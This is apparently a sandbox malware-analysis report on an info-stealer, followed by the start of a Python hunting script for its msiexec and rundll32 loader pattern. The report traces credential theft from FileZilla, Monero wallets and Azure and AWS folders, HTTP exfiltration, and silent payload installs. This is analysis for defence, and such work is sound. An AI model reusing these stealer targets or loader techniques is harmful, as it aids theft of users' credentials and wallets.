                          • Instruction Fuzzy Hash: B5513BF3E155205BE704AA3DDD457A6BAD6DBE4320F1B463DDA88D33C0E978580542D2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                            • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                            • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                            • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                            • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                            • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                            • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00140DBA,00140DB7,00140DB6,00140DB3), ref: 00130362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00130369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00130385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 001303CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 001303DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00130419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00130463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 0013051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 0013054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00130562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00130571
                          • lstrcat.KERNEL32(?,url: ), ref: 00130580
                          • lstrcat.KERNEL32(?,00000000), ref: 00130593
                          • lstrcat.KERNEL32(?,00141678), ref: 001305A2
                          • lstrcat.KERNEL32(?,00000000), ref: 001305B5
                          • lstrcat.KERNEL32(?,0014167C), ref: 001305C4
                          • lstrcat.KERNEL32(?,login: ), ref: 001305D3
                          • lstrcat.KERNEL32(?,00000000), ref: 001305E6
                          • lstrcat.KERNEL32(?,00141688), ref: 001305F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00130604
                          • lstrcat.KERNEL32(?,00000000), ref: 00130617
                          • lstrcat.KERNEL32(?,00141698), ref: 00130626
                          • lstrcat.KERNEL32(?,0014169C), ref: 00130635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 0013068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 7eff7f9b94417c3c2cb9cf1f6e9397f00746e74649f77597cbc2089729dbf8aa
                          • Instruction ID: 5561efff4b7b17fc000f0820377fa3c5d9713ab1adadae03e44fa9106ddfde26
                          • Opcode Fuzzy Hash: 7eff7f9b94417c3c2cb9cf1f6e9397f00746e74649f77597cbc2089729dbf8aa
                          • Instruction Fuzzy Hash: CBD13072900208ABCB05EBF4DD96EEE777CAF28301F848458F142B7091DF75AA49DB61
                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                            • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001259F8
                          • StrCmpCA.SHLWAPI(?,00F0F920), ref: 00125A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00125B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00F0F8E0,00000000,?,00F0EBA8,00000000,?,00141A1C), ref: 00125E71
                          • lstrlen.KERNEL32(00000000), ref: 00125E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00125E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00125E9A
                          • lstrlen.KERNEL32(00000000), ref: 00125EAF
                          • lstrlen.KERNEL32(00000000), ref: 00125ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00125EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00125F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00125F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00125F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00125FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00125FBD
                          • HttpOpenRequestA.WININET(00000000,00F0F8B0,?,00F0EFA8,00000000,00000000,00400100,00000000), ref: 00125BF8
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • InternetCloseHandle.WININET(00000000), ref: 00125FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: 5abbfb5ccb874e0b3f87f5d319d7d9daed6e5395672bf01b21c280c4e1784273
                          • Instruction ID: 356a0e46be21a76413d7417e62a992453b948d2014d811093d7dac1fda0dce4b
                          • Opcode Fuzzy Hash: 5abbfb5ccb874e0b3f87f5d319d7d9daed6e5395672bf01b21c280c4e1784273
                          • Instruction Fuzzy Hash: C612DD72860118ABDB15EBA0DCA5FEEB378BF24701F904199F146730A1EF706A49CF65
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00F0EC08,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0012D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0012D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D208
                          • lstrcat.KERNEL32(?,00141478), ref: 0012D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D22A
                          • lstrcat.KERNEL32(?,0014147C), ref: 0012D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D24C
                          • lstrcat.KERNEL32(?,00141480), ref: 0012D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D26E
                          • lstrcat.KERNEL32(?,00141484), ref: 0012D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D290
                          • lstrcat.KERNEL32(?,00141488), ref: 0012D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D2B2
                          • lstrcat.KERNEL32(?,0014148C), ref: 0012D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D2D4
                          • lstrcat.KERNEL32(?,00141490), ref: 0012D2E3
                            • Part of subcall function 0013A820: lstrlen.KERNEL32(00124F05,?,?,00124F05,00140DDE), ref: 0013A82B
                            • Part of subcall function 0013A820: lstrcpy.KERNEL32(00140DDE,00000000), ref: 0013A885
                          • lstrlen.KERNEL32(?), ref: 0012D32A
                          • lstrlen.KERNEL32(?), ref: 0012D339
                            • Part of subcall function 0013AA70: StrCmpCA.SHLWAPI(00F09A18,0012A7A7,?,0012A7A7,00F09A18), ref: 0013AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0012D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: d3134bc56c4540df9208354ed5749bd6c83470df55ea343aab2bfa723462c1ab
                          • Instruction ID: b4f2caaa8e3ec214bb659430936f019456c5227443c7eb7544b4e70051743c67
                          • Opcode Fuzzy Hash: d3134bc56c4540df9208354ed5749bd6c83470df55ea343aab2bfa723462c1ab
                          • Instruction Fuzzy Hash: 2EE10A72910118ABCB05EBA0DD96EEE777CBF24301F904158F146B70A1DF75AA09CFA2
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00F0D508,00000000,?,0014144C,00000000,?,?), ref: 0012CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0012CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0012CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0012CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0012CAD9
                          • StrStrA.SHLWAPI(?,00F0D688,00140B52), ref: 0012CAF7
                          • StrStrA.SHLWAPI(00000000,00F0D640), ref: 0012CB1E
                          • StrStrA.SHLWAPI(?,00F0E250,00000000,?,00141458,00000000,?,00000000,00000000,?,00F09A88,00000000,?,00141454,00000000,?), ref: 0012CCA2
                          • StrStrA.SHLWAPI(00000000,00F0E3F0), ref: 0012CCB9
                            • Part of subcall function 0012C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0012C871
                            • Part of subcall function 0012C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0012C87C
                          • StrStrA.SHLWAPI(?,00F0E3F0,00000000,?,0014145C,00000000,?,00000000,00F09A68), ref: 0012CD5A
                          • StrStrA.SHLWAPI(00000000,00F09818), ref: 0012CD71
                            • Part of subcall function 0012C820: lstrcat.KERNEL32(?,00140B46), ref: 0012C943
                            • Part of subcall function 0012C820: lstrcat.KERNEL32(?,00140B47), ref: 0012C957
                            • Part of subcall function 0012C820: lstrcat.KERNEL32(?,00140B4E), ref: 0012C978
                          • lstrlen.KERNEL32(00000000), ref: 0012CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0012CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: 51d281fda78b0e4206ef61a9f0e99a474ede1df458d00c44b85443473ec110a6
                          • Instruction ID: df2cbc6c3912c76a69765ce11a7b81001357d6466406c7442063595719f44866
                          • Opcode Fuzzy Hash: 51d281fda78b0e4206ef61a9f0e99a474ede1df458d00c44b85443473ec110a6
                          • Instruction Fuzzy Hash: CBE1F071D10108ABDB15EBA4DC96FEEB778AF24301F804199F14677191EF706A4ACFA2
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • RegOpenKeyExA.ADVAPI32(00000000,00F0B878,00000000,00020019,00000000,001405B6), ref: 001383A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00138426
                          • wsprintfA.USER32 ref: 00138459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0013847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0013848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00138499
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: d0e25310d622febf9e9cbe222535976cb2adaa80838186722dac38c04b169352
                          • Instruction ID: eee742040809c0b4afcfe97b96a7b9aa48e541a1c39b4360b6a9458f7f92d774
                          • Opcode Fuzzy Hash: d0e25310d622febf9e9cbe222535976cb2adaa80838186722dac38c04b169352
                          • Instruction Fuzzy Hash: DB810CB1910218ABEB25DB50CC95FEA77B8FF58700F4082D9F149A6140DF716B85CF95
                          APIs
                            • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00134DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00134DCD
                            • Part of subcall function 00134910: wsprintfA.USER32 ref: 0013492C
                            • Part of subcall function 00134910: FindFirstFileA.KERNEL32(?,?), ref: 00134943
                          • lstrcat.KERNEL32(?,00000000), ref: 00134E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00134E59
                            • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FDC), ref: 00134971
                            • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FE0), ref: 00134987
                            • Part of subcall function 00134910: FindNextFileA.KERNEL32(000000FF,?), ref: 00134B7D
                            • Part of subcall function 00134910: FindClose.KERNEL32(000000FF), ref: 00134B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00134EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00134EE5
                            • Part of subcall function 00134910: wsprintfA.USER32 ref: 001349B0
                            • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,001408D2), ref: 001349C5
                            • Part of subcall function 00134910: wsprintfA.USER32 ref: 001349E2
                            • Part of subcall function 00134910: PathMatchSpecA.SHLWAPI(?,?), ref: 00134A1E
                            • Part of subcall function 00134910: lstrcat.KERNEL32(?,00F0F8A0), ref: 00134A4A
                            • Part of subcall function 00134910: lstrcat.KERNEL32(?,00140FF8), ref: 00134A5C
                            • Part of subcall function 00134910: lstrcat.KERNEL32(?,?), ref: 00134A70
                            • Part of subcall function 00134910: lstrcat.KERNEL32(?,00140FFC), ref: 00134A82
                            • Part of subcall function 00134910: lstrcat.KERNEL32(?,?), ref: 00134A96
                            • Part of subcall function 00134910: CopyFileA.KERNEL32(?,?,00000001), ref: 00134AAC
                            • Part of subcall function 00134910: DeleteFileA.KERNEL32(?), ref: 00134B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 3de5d44fc0d7891701042e9b94752750c90e2581c131f423a4b0f4d3c808a3d5
                          • Instruction ID: d1178a3cd8d02df0eda92f2006852fc55003effb727cecdf9f9c43d5866c3fca
                          • Opcode Fuzzy Hash: 3de5d44fc0d7891701042e9b94752750c90e2581c131f423a4b0f4d3c808a3d5
                          • Instruction Fuzzy Hash: BC4183BA94021877C710F760EC57FED3638AB34705F404894B289670C2EFB197C88B92
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0013906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 892acca172d047672027b8bf57c8687093021fa8ef39fbc4234394209d5a157e
                          • Instruction ID: 13f6a21c044cfa3b440a498bbae8310b8a7aefe1cddacb8c5fc895cdcfa2cd26
                          • Opcode Fuzzy Hash: 892acca172d047672027b8bf57c8687093021fa8ef39fbc4234394209d5a157e
                          • Instruction Fuzzy Hash: 7171B9B5910608ABDB04EBE4DD89FEEBBBDBF58700F108508F516A7290DB74A905CF61
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 001331C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0013335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 001334EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 432280aca50fd5500dc815ca9d4b5f4f1c20cf145e2b050270d8b780bc9c5445
                          • Instruction ID: 3f35fb74d10c0c8d3918694629b5059df213c85233108eff23360af54a110ac9
                          • Opcode Fuzzy Hash: 432280aca50fd5500dc815ca9d4b5f4f1c20cf145e2b050270d8b780bc9c5445
                          • Instruction Fuzzy Hash: 9C121371850108AADB19FBA0DC92FEDB778AF24301F904199F54776191EF742B4ACFA2
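Analyst note (added here; not part of the Joe Sandbox output or of the sample): the ShellExecuteEx.SHELL32 calls at 001331C5, 0013335D and 001334EA together with the strings `/i "`, ` /passive`, `.msi`, `.dll`, `C:\Windows\system32\msiexec.exe` and `C:\Windows\system32\rundll32.exe` show the sample handing a downloaded payload to msiexec (`/i "<file>.msi" /passive`) or to rundll32 (`<file>.dll`). The Python below turns that into a hunting check over process-creation telemetry. The event dictionaries, the Sysmon Event ID 1 field names used for them (Image, CommandLine, ParentImage), the user-writable directory list and the rule names are this example's own constructions; the report contains none of them.

```python
"""Hunting logic for the loader pattern seen in the ShellExecuteEx function:
msiexec.exe /i "<dropped>.msi" /passive for MSI payloads and
rundll32.exe <dropped>.dll for DLL payloads. Events are dictionaries using
Sysmon Event ID 1 field names (Image, CommandLine, ParentImage); the sample
events at the bottom are constructed for this example."""
import re
from dataclasses import dataclass

# Locations an unprivileged user can write to. A payload dropped by a stealer
# lives here; packages deployed by software management normally do not.
USER_WRITABLE = re.compile(
    r"(?i)(\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\"
    r"|\\programdata\\|\\windows\\temp\\|\\temp\\)"
)
_TOKEN = re.compile(r'"[^"]*"|\S+')


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


def split_cmdline(cmdline: str) -> list[str]:
    """Windows-style split: a quoted path stays one token, quotes are removed."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def check_event(event: dict) -> list[Finding]:
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "")
    argv = split_cmdline(event["CommandLine"])[1:]  # drop argv[0]
    flags = {a.lower() for a in argv if a.startswith("/")}
    findings: list[Finding] = []

    if image == "msiexec.exe" and "/i" in flags:
        msi = next((a for a in argv if a.lower().endswith(".msi")), "")
        if USER_WRITABLE.search(msi):
            findings.append(Finding("msiexec_install_from_user_dir", msi))
        # "/passive" suppresses prompts; combined with a parent that itself
        # runs from a user directory it matches the sample, not a helpdesk push.
        if "/passive" in flags and USER_WRITABLE.search(parent):
            findings.append(Finding("msiexec_passive_from_user_dir_parent", parent))

    elif image == "rundll32.exe":
        # rundll32 takes "<dll>,<export>"; keep only the DLL path.
        dll = next((a.split(",", 1)[0] for a in argv if ".dll" in a.lower()), "")
        if USER_WRITABLE.search(dll):
            findings.append(Finding("rundll32_dll_from_user_dir", dll))
        if USER_WRITABLE.search(parent):
            findings.append(Finding("rundll32_from_user_dir_parent", parent))

    return findings


# Constructed telemetry: two records modelled on the behaviour above, two benign.
SAMPLE_EVENTS = [
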